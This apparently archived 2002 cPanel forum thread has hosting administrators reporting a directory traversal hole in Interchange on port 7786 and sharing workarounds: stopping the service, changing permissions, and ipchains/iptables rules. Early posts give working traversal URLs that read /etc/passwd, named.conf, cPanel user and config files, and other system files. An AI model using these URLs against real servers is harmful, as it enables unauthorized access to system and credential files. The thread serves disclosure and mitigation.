The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Am I cracking up or.....

Discussion in 'General Discussion' started by Stormtrooper, Aug 9, 2002.

  1. Stormtrooper

    Stormtrooper Active Member

    Joined:
    Dec 18, 2001
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    Ok redhat users, try this one on your server:

    http://YOURSERVER.COM:7786/../../../../../../../../../etc/passwd

    let me know if you see anything strange....
     
  2. feanor

    feanor Well-Known Member

    Joined:
    Aug 13, 2001
    Messages:
    836
    Likes Received:
    0
    Trophy Points:
    16
    confirmed- gaping hole in Interchange.

    AAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

    researching now.
     
  3. itf

    itf Well-Known Member

    Joined:
    May 9, 2002
    Messages:
    624
    Likes Received:
    0
    Trophy Points:
    16
    It is not necessary to use 9 times &../& after 7786/ ; 6 times are enough

    http://domain.com:7786/../../../../../../etc/passwd
    http://domain.com:7786/../../../../../../etc/group
    http://domain.com:7786/../../../../../../etc/named.conf
    http://domain.com:7786/../../../../../../root/anaconda-ks.cfg
    http://domain.com:7786/../../../../../../usr/local/cpanel/etc/cpanel.config

    change username with usernames in /etc/passwd
    http://domain.com:7786/../../../../../../var/cpanel/users/username


    it seems it is not necessary to waste time for SSH connection !!!:)
    http://domain.com:7786/../../../../../../etc/httpd/conf/httpd.conf
    http://domain.com:7786/../../../../../../etc/proftpd.conf
    http://domain.com:7786/../../../../../../etc/hosts


    in brief everything in a server.

    Damn hole


    I stopped Interchange on our critical servers
     
  4. Stormtrooper

    Stormtrooper Active Member

    Joined:
    Dec 18, 2001
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    /*fix removed*/


    CPANEL is too &smart&....if 'un'chmod's the file...if we get something I'll be happy to share it
     
  5. feanor

    feanor Well-Known Member

    Joined:
    Aug 13, 2001
    Messages:
    836
    Likes Received:
    0
    Trophy Points:
    16
    I submitted a bug to redhat regarding this, using one of their boxes as an example....
    hopefully that means they will take action soon.
    :p

    If any one has a fix for this that allows IC to stay running, please share... we are working one internally at this time.

    :p
     
  6. itf

    itf Well-Known Member

    Joined:
    May 9, 2002
    Messages:
    624
    Likes Received:
    0
    Trophy Points:
    16
    To Stop the Interchange, use these commands in a Root SSH session
    [b:9d67360414]
    /etc/rc.d/init.d/cpanel3 stop

    chmod 600 /usr/local/cpanel/bin/startinterchange

    /etc/rc.d/init.d/cpanel3 start [/b:9d67360414]
     
  7. Stormtrooper

    Stormtrooper Active Member

    Joined:
    Dec 18, 2001
    Messages:
    30
    Likes Received:
    0
    Trophy Points:
    6
    now, like the &kill interchange& thing I posted...does cpanel find the improper permissions and &fix& it for you in 10 minutes? the only difference between what you posted and what I posted was that I screwed up and posted a 500 instead of 600 permission
     
  8. itf

    itf Well-Known Member

    Joined:
    May 9, 2002
    Messages:
    624
    Likes Received:
    0
    Trophy Points:
    16
    [quote:b55e7e62f4][i:b55e7e62f4]Originally posted by Stormtrooper[/i:b55e7e62f4]

    now, like the &kill interchange& thing I posted...does cpanel find the improper permissions and &fix& it for you in 10 minutes? the only difference between what you posted and what I posted was that I screwed up and posted a 500 instead of 600 permission[/quote:b55e7e62f4]
    chmod 500 leaves it executable for Root and cpanel can run it, use chmod 600 it will not run until the next cpanel upgrade
     
  9. feanor

    feanor Well-Known Member

    Joined:
    Aug 13, 2001
    Messages:
    836
    Likes Received:
    0
    Trophy Points:
    16
    just disable interchange in &service manager& via WHManager- it's much, much less painful.

    hopefully we have a patch soon.
    REDHAT bestow your mighty skillz upon us!
     
  10. bdraco

    bdraco Guest

    /sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT
    /sbin/ipchains -A input -s 0/0 -d 0/0 7786 -p tcp -y -j DENY


    Running the above should allow interchange to continue to function and prevent people from remotly taking advantage of this hole.
     
  11. bert

    bert Well-Known Member

    Joined:
    Aug 21, 2001
    Messages:
    602
    Likes Received:
    0
    Trophy Points:
    16
    Thanks Nick. It worked :p
     
  12. techark

    techark Well-Known Member

    Joined:
    May 22, 2002
    Messages:
    280
    Likes Received:
    0
    Trophy Points:
    16
    Nick ?

    Why am I getting protocol not avaliable when I run those commands?
     
  13. techid

    techid Member

    Joined:
    Aug 5, 2002
    Messages:
    24
    Likes Received:
    0
    Trophy Points:
    1
    I also am getting the same thing...

    root@capital ]# /sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT
    ipchains: Protocol not available
     
  14. joana

    joana Well-Known Member

    Joined:
    Sep 29, 2001
    Messages:
    103
    Likes Received:
    0
    Trophy Points:
    16
    ipchains: Protocol not available
     
  15. MarlboroMan

    MarlboroMan Well-Known Member

    Joined:
    Dec 7, 2001
    Messages:
    64
    Likes Received:
    0
    Trophy Points:
    6
    Possibly you have to use IPTables instead of IPChains?

    /sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT
    /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

    (correct me if the statements are wrong, that's been known to happen)
     
  16. bdraco

    bdraco Guest

    Right .. your machine might have iptables instead of ipchains.

    If it still doesn't work
    try

    modprobe ipchains first

    If still not, then you need to recompile your kernel with ipchains or iptables support.
     
  17. joana

    joana Well-Known Member

    Joined:
    Sep 29, 2001
    Messages:
    103
    Likes Received:
    0
    Trophy Points:
    16
    [quote:e7b757c7f8][i:e7b757c7f8]Originally posted by MarlboroMan[/i:e7b757c7f8]

    Possibly you have to use IPTables instead of IPChains?

    /sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT
    /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

    (correct me if the statements are wrong, that's been known to happen)[/quote:e7b757c7f8]

    root@xxxxxx [~]# /sbin/iptables -A INPUT -p tcp -s 127.0.0.1 -d 127.0.0.1 --destination-port 7786 -j ACCEPT

    root@xxxxxx [~]# /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j DENY

    iptables v1.2.4: Couldn't load target `DENY':/lib/iptables/libipt_DENY.so: cannot open shared object file: No such file or directory

    Try `iptables -h' or 'iptables --help' for more information.
     
  18. Annette

    Annette Well-Known Member
    PartnerNOC

    Joined:
    Aug 12, 2001
    Messages:
    445
    Likes Received:
    0
    Trophy Points:
    16
    Try this instead:

    /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j REJECT

    iptables uses REJECT as the default instead of DENY.
     
  19. joana

    joana Well-Known Member

    Joined:
    Sep 29, 2001
    Messages:
    103
    Likes Received:
    0
    Trophy Points:
    16
    [quote:ae47852901][i:ae47852901]Originally posted by Annette[/i:ae47852901]

    Try this instead:

    /sbin/iptables -A INPUT -p tcp -s 0/0 -d 0/0 --destination-port 7786 -j REJECT

    iptables uses REJECT as the default instead of DENY.[/quote:ae47852901]

    It worked..Thanks :)
     
  20. MarlboroMan

    MarlboroMan Well-Known Member

    Joined:
    Dec 7, 2001
    Messages:
    64
    Likes Received:
    0
    Trophy Points:
    6
    Another note....

    If you reboot your machine, these firewall rules get flushed.

    You might want to put those two commands in one of your init scripts until Interchange releases a permanent fix.
     

Share This Page